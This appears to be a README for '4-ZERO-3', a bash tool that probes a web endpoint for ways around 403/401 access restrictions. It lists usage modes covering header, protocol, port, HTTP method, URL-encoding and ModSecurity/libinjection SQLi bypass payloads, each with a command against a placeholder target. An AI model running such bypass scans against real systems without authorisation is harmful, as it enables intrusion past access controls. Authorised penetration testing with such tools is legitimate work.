4-ZERO-3 Tool to bypass 403/401. This script contain all the possible techniques to do the same.

  • NOTE : If you see multiple [200 Ok]/bypasses as output, you must check the Content-Length. If the content-length is same for multiple [200 Ok]/bypasses means false positive. Reason can be "301/302" or "../" [Payload] DON'T PANIC.
  • Script will print cURL PAYLOAD if possible bypass found.

>_ Preview



>_ Help

[email protected]_dheeraj:$ bash 403-bypass.sh -h



Β 

>_ Usage / Modes

  • Scan with specific payloads:
    • [ --header ] Support HEADER based bypasses/payloads
      [email protected]_dheeraj:$ bash 403-bypass.sh -u https://target.com/secret --header
    • [ --protocol ] Support PROTOCOL based bypasses/payloads
      [email protected]_dheeraj:$ bash 403-bypass.sh -u https://target.com/secret --protocol
    • [ --port ] Support PORT based bypasses/payloads
      [email protected]_dheeraj:$ bash 403-bypass.sh -u https://target.com/secret --port
    • [ --HTTPmethod ] Support HTTP Method based bypasses/payloads
      [email protected]_dheeraj:$ bash 403-bypass.sh -u https://target.com/secret --HTTPmethod
    • [ --encode ] Support URL Encoded bypasses/payloads
      [email protected]_dheeraj:$ bash 403-bypass.sh -u https://target.com/secret --encode
    • [ --SQLi ] Support MySQL mod_Security & libinjection bypasses/payloads [** New **]
      [email protected]_dheeraj:$ bash 403-bypass.sh -u https://target.com/secret --SQLi
  • Complete Scan {includes all exploits/payloads} for an endpoint [ --exploit ]
[email protected]_dheeraj:$ bash 403-bypass.sh -u https://target.com/secret --exploit
Prerequisites
  • apt install curl [Debian]


❌